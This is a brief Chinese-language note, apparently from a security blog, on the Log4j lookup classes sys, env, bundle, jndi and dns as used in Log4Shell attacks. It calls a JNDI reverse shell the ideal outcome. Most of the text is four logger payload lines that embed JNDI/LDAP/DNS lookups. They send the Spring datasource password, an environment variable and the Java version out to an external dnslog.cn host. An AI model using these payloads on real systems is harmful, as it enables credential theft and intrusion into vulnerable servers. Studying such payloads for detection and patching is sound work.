lookup类
可用的类如下
大佬们主要使用的有sys、env、bundle、jndi、dns
前面三个配合jndi和dns外带,能jndi反弹shell当然就是最香的了。
LOGGER.error("${jndi:ldap://test.${bundle:application:spring.datasource.password}.j459j1.dnslog.cn/a}");
LOGGER.error("${jndi:ldap://${env:os}.j459j1.dnslog.cn}");
LOGGER.error("${jndi:ldap://1.${sys:java.version}.j459j1.dnslog.cn}");
LOGGER.error("${jndi:dns://2.${sys:java.version}.j459j1.dnslog.cn}");